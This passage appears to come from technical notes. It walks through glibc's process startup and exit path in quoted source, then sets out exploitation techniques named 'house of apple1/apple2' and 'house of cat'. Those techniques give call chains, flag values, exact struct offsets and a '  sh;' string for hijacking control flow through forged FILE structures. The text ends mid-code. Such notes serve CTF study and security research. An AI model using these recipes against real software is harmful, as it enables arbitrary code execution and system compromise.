__libc_lock_unlock (__exit_funcs_lock);
return 0;
}
__new_exitfn
/* Must be called with __exit_funcs_lock held.  */
struct exit_function *
__new_exitfn (struct exit_function_list **listp)
{
struct exit_function_list *p = NULL;
struct exit_function_list *l;
struct exit_function *r = NULL;
size_t i = 0;

if (__exit_funcs_done)
/* Exit code is finished processing all registered exit functions,
therefore we fail this registration. */
return NULL;

for (l = *listp; l != NULL; p = l, l = l->next)
{
for (i = l->idx; i > 0; --i)
if (l->fns[i - 1].flavor != ef_free)
break;

if (i > 0)
break;

/* This block is completely unused. */
l->idx = 0;
}

if (l == NULL || i == sizeof (l->fns) / sizeof (l->fns[0]))
{
/* The last entry in a block is used. Use the first entry in
the previous block if it exists. Otherwise create a new one. */
if (p == NULL)
{
assert (l != NULL);
p = (struct exit_function_list *)
calloc (1, sizeof (struct exit_function_list));
if (p != NULL)
{
p->next = *listp;
*listp = p;
}
}

if (p != NULL)
{
r = &p->fns[0];
p->idx = 1;
}
}
else
{
/* There is more room in the block. */
r = &l->fns[i];
l->idx = i + 1;
}

/* Mark entry as used, but we don't know the flavor now. */
if (r != NULL)
{
r->flavor = ef_us;
++__new_exitfn_called;
}

return r;
}

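__new_exitfn first tries to find a usable slot in __exit_funcs. Within a block, it looks for the position just after the last entry whose flavor is not ef_free (ef_free marks a slot as free) and uses it if the block still has room.

If no slot is found because the block is full, it allocates a new exit_function_list node with calloc and inserts it at the head of the __exit_funcs list. The new node's first slot becomes the allocated exit_function. In either case the slot it returns is marked ef_us, meaning "in use", and the caller then fills in the real flavor (ef_cxa in __internal_atexit).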

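This only finds a slot, so which functions actually get registered? They are registered before main runs, so let's look at the program's entry point, _start: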

_start

ENTRY (_start)
/* Clearing frame pointer is insufficient, use CFI. */
cfi_undefined (rip)
/* Clear the frame pointer. The ABI suggests this be done, to mark
the outermost frame obviously. */
xorl %ebp, %ebp

/* Extract the arguments as encoded on the stack and set up
the arguments for __libc_start_main (int (*main) (int, char **, char **),
int argc, char *argv,
void (*init) (void), void (*fini) (void),
void (*rtld_fini) (void), void *stack_end).
The arguments are passed via registers and on the stack:
main: %rdi
argc: %rsi
argv: %rdx
init: %rcx
fini: %r8
rtld_fini: %r9
stack_end: stack. */

mov %RDX_LP, %R9_LP /* Address of the shared library termination
function. */
#ifdef __ILP32__
mov (%rsp), %esi /* Simulate popping 4-byte argument count. */
add $4, %esp
#else
popq %rsi /* Pop the argument count. */
#endif
/* argv starts just at the current stack top. */
mov %RSP_LP, %RDX_LP
/* Align the stack to a 16 byte boundary to follow the ABI. */
and $~15, %RSP_LP

/* Push garbage because we push 8 more bytes. */
pushq %rax

/* Provide the highest stack address to the user code (for stacks
which grow downwards). */
pushq %rsp

/* These used to be the addresses of .fini and .init. */
xorl %r8d, %r8d
xorl %ecx, %ecx

#ifdef PIC
mov main@GOTPCREL(%rip), %RDI_LP
#else
mov $main, %RDI_LP
#endif

/* Call the user's main function, and exit with its value.
But let the libc call main. Since __libc_start_main in
libc.so is called very early, lazy binding isn't relevant
here. Use indirect branch via GOT to avoid extra branch
to PLT slot. In case of static executable, ld in binutils
2.26 or above can convert indirect branch into direct
branch. */
call *__libc_start_main@GOTPCREL(%rip)

hlt /* Crash if somehow `exit' does return. */
END (_start)

/* Define a symbol for the first piece of initialized data. */
.data
.globl __data_start
__data_start:
.long 0
.weak data_start
data_start = __data_start

Of the arguments passed to __libc_start_main (main, argc, argv, init, fini, rtld_fini, stack_end), the first three need no explanation. The interesting ones are init, fini and rtld_fini:

/* Note: The init and fini parameters are no longer used.  fini is
completely unused, init is still called if not NULL, but the
current startup code always passes NULL. (In the future, it would
be possible to use fini to pass a version code if init is NULL, to
indicate the link-time glibc without introducing a hard
incompatibility for new programs with older glibc versions.)

For dynamically linked executables, the dynamic segment is used to
locate constructors and destructors. For statically linked
executables, the relevant symbols are access directly. */
STATIC int
LIBC_START_MAIN (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv,
#ifdef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec,
#endif
__typeof (main) init,
void (*fini) (void),
void (*rtld_fini) (void), void *stack_end)
{
#ifndef SHARED
char **ev = &argv[argc + 1];

__environ = ev;

/* Store the lowest stack address. This is done in ld.so if this is
the code for the DSO. */
__libc_stack_end = stack_end;

# ifdef HAVE_AUX_VECTOR
/* First process the auxiliary vector since we need to find the
program header to locate an eventually present PT_TLS entry. */
# ifndef LIBC_START_MAIN_AUXVEC_ARG
ElfW(auxv_t) *auxvec;
{
char **evp = ev;
while (*evp++ != NULL)
;
auxvec = (ElfW(auxv_t) *) evp;
}
# endif
_dl_aux_init (auxvec);
if (GL(dl_phdr) == NULL)
# endif
{
/* Starting from binutils-2.23, the linker will define the
magic symbol __ehdr_start to point to our own ELF header
if it is visible in a segment that also includes the phdrs.
So we can set up _dl_phdr and _dl_phnum even without any
information from auxv. */

extern const ElfW(Ehdr) __ehdr_start
# if BUILD_PIE_DEFAULT
__attribute__ ((visibility ("hidden")));
# else
__attribute__ ((weak, visibility ("hidden")));
if (&__ehdr_start != NULL)
# endif
{
assert (__ehdr_start.e_phentsize == sizeof *GL(dl_phdr));
GL(dl_phdr) = (const void *) &__ehdr_start + __ehdr_start.e_phoff;
GL(dl_phnum) = __ehdr_start.e_phnum;
}
}

/* Initialize very early so that tunables can use it. */
__libc_init_secure ();

__tunables_init (__environ);

ARCH_INIT_CPU_FEATURES ();

/* Do static pie self relocation after tunables and cpu features
are setup for ifunc resolvers. Before this point relocations
must be avoided. */
_dl_relocate_static_pie ();

/* Perform IREL{,A} relocations. */
ARCH_SETUP_IREL ();

/* The stack guard goes into the TCB, so initialize it early. */
ARCH_SETUP_TLS ();

/* In some architectures, IREL{,A} relocations happen after TLS setup in
order to let IFUNC resolvers benefit from TCB information, e.g. powerpc's
hwcap and platform fields available in the TCB. */
ARCH_APPLY_IREL ();

/* Set up the stack checker's canary. */
uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
__stack_chk_guard = stack_chk_guard;
# endif

# ifdef DL_SYSDEP_OSCHECK
{
/* This needs to run to initiliaze _dl_osversion before TLS
setup might check it. */
DL_SYSDEP_OSCHECK (__libc_fatal);
}
# endif

/* Initialize libpthread if linked in. */
if (__pthread_initialize_minimal != NULL)
__pthread_initialize_minimal ();

/* Set up the pointer guard value. */
uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
__pointer_chk_guard_local = pointer_chk_guard;
# endif

#endif /* !SHARED */

/* Register the destructor of the dynamic linker if there is any. */
if (__glibc_likely (rtld_fini != NULL))
__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);

#ifndef SHARED
/* Perform early initialization. In the shared case, this function
is called from the dynamic loader as early as possible. */
__libc_early_init (true);

/* Call the initializer of the libc. This is only needed here if we
are compiling for the static library in which case we haven't
run the constructors in `_dl_start_user'. */
__libc_init_first (argc, argv, __environ);

/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

/* Some security at this point. Prevent starting a SUID binary where
the standard file descriptors are not opened. We have to do this
only for statically linked applications since otherwise the dynamic
loader did the work already. */
if (__builtin_expect (__libc_enable_secure, 0))
__libc_check_standard_fds ();
#endif /* !SHARED */

/* Call the initializer of the program, if any. */
#ifdef SHARED
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
GLRO(dl_debug_printf) ("\ninitialize program: %s\n\n", argv[0]);

if (init != NULL)
/* This is a legacy program which supplied its own init
routine. */
(*init) (argc, argv, __environ MAIN_AUXVEC_PARAM);
else
/* This is a current program. Use the dynamic segment to find
constructors. */
call_init (argc, argv, __environ);

/* Auditing checkpoint: we have a new object. */
_dl_audit_preinit (GL(dl_ns)[LM_ID_BASE]._ns_loaded);

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
GLRO(dl_debug_printf) ("\ntransferring control: %s\n\n", argv[0]);
#else /* !SHARED */
call_init (argc, argv, __environ);

_dl_debug_initialize (0, LM_ID_BASE);
#endif

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);
}

/* Starting with glibc 2.34, the init parameter is always NULL. Older
libcs are not prepared to handle that. The macro
DEFINE_LIBC_START_MAIN_VERSION creates GLIBC_2.34 alias, so that
newly linked binaries reflect that dependency. The macros below
expect that the exported function is called
__libc_start_main_impl. */

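Since glibc 2.34, the init and fini parameters are obsolete (init is always NULL). As the code shows, __libc_start_main runs the constructors itself through call_init: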

/* Initialization for dynamic executables.  Find the main executable
link map and run its init functions. */
static void
call_init (int argc, char **argv, char **env)
{
/* Obtain the main map of the executable. */
struct link_map *l = GL(dl_ns)[LM_ID_BASE]._ns_loaded;

/* DT_PREINIT_ARRAY is not processed here. It is already handled in
_dl_init in elf/dl-init.c. Also see the call_init function in
the same file. */

if (ELF_INITFINI && l->l_info[DT_INIT] != NULL)
DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr,
argc, argv, env);

ElfW(Dyn) *init_array = l->l_info[DT_INIT_ARRAY];
if (init_array != NULL)
{
unsigned int jm
= l->l_info[DT_INIT_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr));
ElfW(Addr) *addrs = (void *) (init_array->d_un.d_ptr + l->l_addr);
for (unsigned int j = 0; j < jm; ++j)
((dl_init_t) addrs[j]) (argc, argv, env);
}
}

/* Initialization for static executables. There is no dynamic
segment, so we access the symbols directly. */
static void
call_init (int argc, char **argv, char **envp)
{
/* For static executables, preinit happens right before init. */
{
const size_t size = __preinit_array_end - __preinit_array_start;
size_t i;
for (i = 0; i < size; i++)
(*__preinit_array_start [i]) (argc, argv, envp);
}

# if ELF_INITFINI
_init ();
# endif

const size_t size = __init_array_end - __init_array_start;
for (size_t i = 0; i < size; i++)
(*__init_array_start [i]) (argc, argv, envp);
}

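For a dynamically linked program, call_init takes the main executable's link_map and runs .init (DT_INIT, only when ELF_INITFINI is set). It then walks the .init_array function array, running the executable's constructors; the static variant also runs .preinit_array first. The constructors of the shared objects loaded by the dynamic linker are run elsewhere: _dl_init calls its own call_init (in elf/dl-init.c) for each of them. _dl_init looks like this: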

void
_dl_init (struct link_map *main_map, int argc, char **argv, char **env)
{
ElfW(Dyn) *preinit_array = main_map->l_info[DT_PREINIT_ARRAY];
ElfW(Dyn) *preinit_array_size = main_map->l_info[DT_PREINIT_ARRAYSZ];
unsigned int i;

if (__glibc_unlikely (GL(dl_initfirst) != NULL))
{
call_init (GL(dl_initfirst), argc, argv, env);
GL(dl_initfirst) = NULL;
}

/* Don't do anything if there is no preinit array. */
if (__builtin_expect (preinit_array != NULL, 0)
&& preinit_array_size != NULL
&& (i = preinit_array_size->d_un.d_val / sizeof (ElfW(Addr))) > 0)
{
ElfW(Addr) *addrs;
unsigned int cnt;

if (__glibc_unlikely (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
_dl_debug_printf ("\ncalling preinit: %s\n\n",
DSO_FILENAME (main_map->l_name));

addrs = (ElfW(Addr) *) (preinit_array->d_un.d_ptr + main_map->l_addr);
for (cnt = 0; cnt < i; ++cnt)
((dl_init_t) addrs[cnt]) (argc, argv, env);
}

/* Stupid users forced the ELF specification to be changed. It now
says that the dynamic loader is responsible for determining the
order in which the constructors have to run. The constructors
for all dependencies of an object must run before the constructor
for the object itself. Circular dependencies are left unspecified.

This is highly questionable since it puts the burden on the dynamic
loader which has to find the dependencies at runtime instead of
letting the user do it right. Stupidity rules! */

i = main_map->l_searchlist.r_nlist;
while (i-- > 0)
call_init (main_map->l_initfini[i], argc, argv, env);

#ifndef HAVE_INLINED_SYSCALLS
/* Finished starting up. */
_dl_starting_up = 0;
#endif
}
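So who calls _dl_init? There is a second _start, in dl-start.S, which is the dynamic linker's entry point. The _start above is in start.S, the program's entry point. The listing below happens to be the OpenRISC (or1k) version; on x86-64 the same logic lives in the RTLD_START macro in sysdeps/x86_64/dl-machine.h.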

/* Initial entry point code for the dynamic linker.
The function _dl_start is the real entry point;
it's return value is the user program's entry point. */
ENTRY (_start)
/* Count arguments in r11 */
l.ori r3, r1, 0
l.movhi r11, 0
1:
l.addi r3, r3, 4
l.lwz r12, 0(r3)
l.sfnei r12, 0
l.addi r11, r11, 1
l.bf 1b
l.nop
l.addi r11, r11, -1
/* store argument counter to stack. */
l.sw 0(r1), r11

/* Load the PIC register. */
l.jal 0x8
l.movhi r16, gotpchi(_GLOBAL_OFFSET_TABLE_-4)
l.ori r16, r16, gotpclo(_GLOBAL_OFFSET_TABLE_+0)
l.add r16, r16, r9

l.ori r3, r1, 0

l.jal _dl_start
l.nop
/* Save user entry in a call saved reg. */
l.ori r22, r11, 0
/* Fall through to _dl_start_user. */

_dl_start_user:
/* Set up for _dl_init. */

/* Load _rtld_local (a.k.a _dl_loaded). */
l.lwz r12, got(_rtld_local)(r16)
l.lwz r3, 0(r12)

/* Load argc */
l.lwz r18, got(_dl_argc)(r16)
l.lwz r4, 0(r18)

/* Load argv */
l.lwz r20, got(_dl_argv)(r16)
l.lwz r5, 0(r20)

/* Load envp = &argv[argc + 1]. */
l.slli r6, r4, 2
l.addi r6, r6, 4
l.add r6, r6, r5

l.jal plt(_dl_init)
l.nop

/* Now set up for user entry.
The already defined ABI loads argc and argv from the stack.

argc = 0(r1)
argv = r1 + 4
*/

/* Load SP as argv - 4. */
l.lwz r3, 0(r20)
l.addi r1, r3, -4

/* Save argc. */
l.lwz r3, 0(r18)
l.sw 0(r1), r3

/* Pass _dl_fini function address to _start.
Next start.S will then pass this as rtld_fini to __libc_start_main. */
l.lwz r3, got(_dl_fini)(r16)

l.jr r22
l.nop

END (_start)

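So this is where _dl_start and _dl_init are called, which completes the constructor phase.
Note also that call_fini (statically linked programs) and rtld_fini (dynamically linked programs) are registered in __libc_start_main: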

__cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);
...
/* Register the destructor of the statically-linked program. */
__cxa_atexit (call_fini, NULL, NULL);

At the end of __libc_start_main:

__libc_start_call_main (main, argc, argv MAIN_AUXVEC_PARAM);

_Noreturn static __always_inline void
__libc_start_call_main (int (*main) (int, char **, char ** MAIN_AUXVEC_DECL),
int argc, char **argv MAIN_AUXVEC_DECL)
{
exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));
}

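This is the function that finally calls main and then exit. It also explains why main's return address always lies at a fixed offset inside __libc_start_call_main.
Now look at the registered rtld_fini. It is actually _dl_fini, whose job is to call the destructors of every module in the process, i.e. walk their .fini_array. Here is the relevant part of its source: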

/* Is there a destructor function?  */
if (l->l_info[DT_FINI_ARRAY] != NULL
|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
{
/* When debugging print a message first. */
if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
DSO_FILENAME (l->l_name),
ns);

/* First see whether an array is given. */
if (l->l_info[DT_FINI_ARRAY] != NULL)
{
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
}

/* Next try the old-style destructor. */
if (ELF_INITFINI && l->l_info[DT_FINI] != NULL)
DL_CALL_DT_FINI
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
}

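This walks each object's .fini_array (from the last entry to the first, since i counts down) and then runs the old-style DT_FINI (.fini).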

Summary

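  • The kernel executes the execve() system call
  • The ELF executable is loaded
    • Dynamically linked program: .interp is found
      • The kernel loads the dynamic linker ld.so
      • Jump to ld.so's entry point -> _dl_start (dl-start.S)
        • ld.so loads the dependencies (libc.so, ...) and relocates them
      • _dl_start_user -> _dl_init
        • call_init (runs the shared libraries' .init_array)
      • Jump to the program entry -> _start (start.S)
    • Statically linked program: jump straight to _start (start.S)
  • _start
    • __libc_start_main
      • Register the destructors:
        • Static linking: __cxa_atexit(call_fini)
          • the program's own destructors
        • Dynamic linking: __cxa_atexit(rtld_fini)
          • the dynamic linker does all teardown through _dl_fini
      • call_init (runs the program's .init_array)
      • __libc_start_call_main
        • call main()
        • exit(main())
  • exit(status), called by the user or by __libc_start_call_main when main returns
    • __run_exit_handlers(status)
      • call the TLS destructors: __call_tls_dtors
      • walk exit_function_list, last registered entry first
        • ef_cxa
          • static program: call_fini
            • runs the program's own .fini_array
          • dynamic program: rtld_fini
            • _dl_fini
              • runs .fini_array/DT_FINI of the executable and each shared library, in dependency order
              • cleans up the dynamic linker's resources
        • ef_at -> plain void (*)(void) handlers (atexit itself registers through __cxa_atexit, i.e. as ef_cxa)
        • ef_on -> functions registered with on_exit
        • other flavors are skipped
      • if new handlers are registered meanwhile → restart from the head of the list
      • free the dynamically allocated list nodes
      • if run_list_atexit is true, run the __libc_atexit hook (by default _IO_cleanup())
    • _exit(status)
  • Kernel: the process is terminated for good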

house of apple2 | house of cat

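  • Root cause: struct _IO_wide_data contains _wide_vtable, a vtable-like pointer to an _IO_jump_t structure. As with vtable, glibc defines macros that call the functions in _wide_vtable. The ones actually used in glibc are _IO_WSETBUF, _IO_WUNDERFLOW, _IO_WDOALLOCATE and _IO_WOVERFLOW. Unlike the vtable macros, none of them checks where _wide_vtable points. Compare the two expansions below: _IO_JUMPS_FUNC goes through IO_validate_vtable, while _IO_WIDE_JUMPS_FUNC does not.
    _IO_OVERFLOW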
    #define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
    #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
    _IO_WOVERFLOW
    #define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
    #define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
    #define _IO_WIDE_JUMPS(THIS) _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

_IO_wfile_overflow

  • Call chain
  1. _IO_wfile_overflow
    wint_t
    _IO_wfile_overflow (FILE *f, wint_t wch)
    {
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    /* If currently reading or no buffer allocated. */
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0)
    {
    _IO_wdoallocbuf (f); // we need to reach this call
    // ......
    }
    }
    }
    Conditions:
  • (f->_flags & _IO_NO_WRITES) == 0
  • (f->_flags & _IO_CURRENTLY_PUTTING) == 0
  • f->_wide_data->_IO_write_base == 0
  2. _IO_wdoallocbuf
    void
    _IO_wdoallocbuf (FILE *fp)
    {
    if (fp->_wide_data->_IO_buf_base)
    return;
    if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) // call through an _IO_WXXXX macro
    return;
    _IO_wsetb (fp, fp->_wide_data->_shortbuf,
    fp->_wide_data->_shortbuf + 1, 0);
    }
    libc_hidden_def (_IO_wdoallocbuf)
    Conditions:
  • fp->_wide_data->_IO_buf_base == 0
  • (fp->_flags & _IO_UNBUFFERED) == 0
  3. _IO_WDOALLOCATE

  4. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

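In summary:
  • _flags: the bits 2 | 0x8 | 0x800 must be clear, i.e. _flags & (2 | 0x8 | 0x800) == 0. If rdi does not need to be controlled, 0 is enough. To get a shell, use "  sh;" with two leading spaces: its bytes 0x20 0x20 0x73 0x68 keep all three bits clear, whereas ";sh;" would set 0x2 and 0x8
  • vtable: the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset), so that _IO_wfile_overflow gets called
  • _wide_data: a controllable heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_write_base = 0, i.e. *(A + 0x18) = 0
  • _wide_data->_IO_buf_base = 0, i.e. *(A + 0x30) = 0
  • _wide_data->_wide_vtable: a controllable heap address B, i.e. *(A + 0xe0) = B
  • _wide_data->_wide_vtable->doallocate: the address C used to hijack RIP, i.e. *(B + 0x68) = C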

_IO_wfile_underflow_mmap

  • Call chain
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;

    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp); // we need to reach this call
    }
    //......
    }
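    Conditions:
  • (fp->_flags & _IO_NO_READS) == 0
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_wide_data->_IO_buf_base == NULL, and fp->_wide_data->_IO_save_base == NULL (or a pointer that can safely be freed)
  • (fp->_flags & _IO_UNBUFFERED) == 0, which _IO_wdoallocbuf checks next
  2. _IO_wdoallocbuf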

  3. _IO_WDOALLOCATE

  4. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

In summary:
  • _flags: 0x4 must be clear, and so must 0x2 because _IO_wdoallocbuf checks _IO_UNBUFFERED. If rdi does not need to be controlled, 0 is enough. To get a shell, use "  sh;" with two leading spaces
  • vtable: the address of _IO_wfile_jumps_mmap (plus or minus an offset), so that _IO_wfile_underflow_mmap gets called
  • _IO_read_ptr < _IO_read_end, i.e. *(fp + 8) < *(fp + 0x10)
  • _wide_data: a controllable heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8)
  • _wide_data->_IO_buf_base = 0, i.e. *(A + 0x30) = 0
  • _wide_data->_IO_save_base = 0 or an address that can legitimately be freed, i.e. *(A + 0x40) = 0
  • _wide_data->_wide_vtable: a controllable heap address B, i.e. *(A + 0xe0) = B
  • _wide_data->_wide_vtable->doallocate: the address C used to hijack RIP, i.e. *(B + 0x68) = C

_IO_wdefault_xsgetn

  • Call chain
  1. _IO_wdefault_xsgetn
    size_t
    _IO_wdefault_xsgetn (FILE *fp, void *data, size_t n)
    {
    size_t more = n;
    wchar_t *s = (wchar_t*) data;
    for (;;)
    {
    /* Data available. */
    ssize_t count = (fp->_wide_data->_IO_read_end
    - fp->_wide_data->_IO_read_ptr);
    if (count > 0)
    {
    if ((size_t) count > more)
    count = more;
    if (count > 20)
    {
    s = __wmempcpy (s, fp->_wide_data->_IO_read_ptr, count);
    fp->_wide_data->_IO_read_ptr += count;
    }
    else if (count <= 0)
    count = 0;
    else
    {
    wchar_t *p = fp->_wide_data->_IO_read_ptr;
    int i = (int) count;
    while (--i >= 0)
    *s++ = *p++;
    fp->_wide_data->_IO_read_ptr = p;
    }
    more -= count;
    }
    if (more == 0 || __wunderflow (fp) == WEOF)
    break;
    }
    return n - more;
    }
    libc_hidden_def (_IO_wdefault_xsgetn)
    Conditions:
  • more starts as the third argument n, so n must be nonzero, i.e. rdx must not be 0
  • set fp->_wide_data->_IO_read_ptr == fp->_wide_data->_IO_read_end so that count is 0 and the if branch is skipped
  2. __wunderflow
wint_t
__wunderflow (FILE *fp)
{
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide (fp, 1) != 1))
return WEOF;

if (fp->_mode == 0)
_IO_fwide (fp, 1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_wget_mode (fp) == EOF)
return WEOF;
// ......
}

Conditions:
  • fp->_mode > 0, and (fp->_flags & _IO_CURRENTLY_PUTTING) != 0

  3. _IO_switch_to_wget_mode
int
_IO_switch_to_wget_mode (FILE *fp)
{
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) // we need to reach this call
return EOF;
// .....
}

Conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base

  4. _IO_WOVERFLOW

  5. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

In summary:
  • _flags = 0x800
  • vtable: the address of _IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps (plus or minus an offset), so that _IO_wdefault_xsgetn gets called
  • _mode > 0, i.e. *(fp + 0xc0) > 0
  • _wide_data: a controllable heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_read_ptr == _wide_data->_IO_read_end, i.e. *A == *(A + 8)
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18)
  • _wide_data->_wide_vtable: a controllable heap address B, i.e. *(A + 0xe0) = B
  • _wide_data->_wide_vtable->overflow: the address C used to hijack RIP, i.e. *(B + 0x18) = C, since this chain ends in _IO_WOVERFLOW

_IO_wfile_seekoff(house of cat)

  • Call chain
  1. _IO_wfile_seekoff
    off64_t 
    _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) {
    off64_t result;
    off64_t delta, new_offset;
    long int count;
    /* Short-circuit into a separate function.  We don't want to mix any functionality and we don't want to touch anything inside the FILE object. */
    if (mode == 0)
    return do_ftell_wide (fp);

    ...
    bool was_writing = ((fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp));
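    /* Flush unwritten characters.  (This may do an unneeded write if we seek within the buffer.  But to be able to switch to reading, we would need to set egptr to pptr.  That can't be done in the current design, which assumes file_ptr() is eGptr.  Anyway, since we probably end up flushing when we close(), it doesn't make much difference.)  FIXME: simulate mem-mapped files. */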
    if (was_writing && _IO_switch_to_wget_mode (fp))
    return WEOF;
    Conditions:
  • the mode argument (the 4th argument, rcx) is nonzero; otherwise do_ftell_wide is returned
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base, or (fp->_flags & 0x0800) != 0
  2. _IO_switch_to_wget_mode, conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  3. _IO_WOVERFLOW

  4. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

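In summary:
  • _flags: 0x8 must be clear (~0x8). If _lock cannot be guaranteed to point to readable and writable memory, also set _flags |= 0x8000 (_IO_USER_LOCK)
  • vtable: the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset), so that _IO_wfile_seekoff gets called
  • _mode > 0, i.e. *(fp + 0xc0) > 0
  • _wide_data: a controllable heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_read_ptr > _wide_data->_IO_read_end, i.e. *A > *(A + 8)
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18)
  • _wide_data->_wide_vtable: a controllable heap address B, i.e. *(A + 0xe0) = B
  • _wide_data->_wide_vtable->overflow: the address C used to hijack RIP, i.e. *(B + 0x18) = C, since this chain ends in _IO_WOVERFLOW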

house of apple1

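  • Core idea: forge an _IO_FILE on the heap at a known address A. Replace A + 0xd8 (vtable) with the address of _IO_wstrn_jumps, set A + 0xa0 (_wide_data) to B, and set the other members so that _IO_OVERFLOW is reached. exit() then eventually calls _IO_wstrn_overflow. That function overwrites every qword from B to B + 0x38 with either A + 0xf0 or A + 0x1f0, the start and the end of snf->overflow_buf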
    static wint_t
    _IO_wstrn_overflow (FILE *fp, wint_t c)
    {
    _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;
    if (fp->_wide_data->_IO_buf_base != snf->overflow_buf)
    {
    _IO_wsetb (fp, snf->overflow_buf,
    snf->overflow_buf + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)), 0);
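    // Once fp->_wide_data is controlled, a fixed range of memory starting at fp->_wide_data gets overwritten, which amounts to writing a known address to an arbitrary location.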
    fp->_wide_data->_IO_write_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_read_end = (snf->overflow_buf
    + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)));
    }

    fp->_wide_data->_IO_write_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_write_end = snf->overflow_buf;
    return c;
    }
  • Sometimes the free() inside _IO_wsetb has to be bypassed
    #define _IO_FLAGS2_USER_WBUF 8
    // setting f->_flags2 to 8 is enough to bypass it
    void
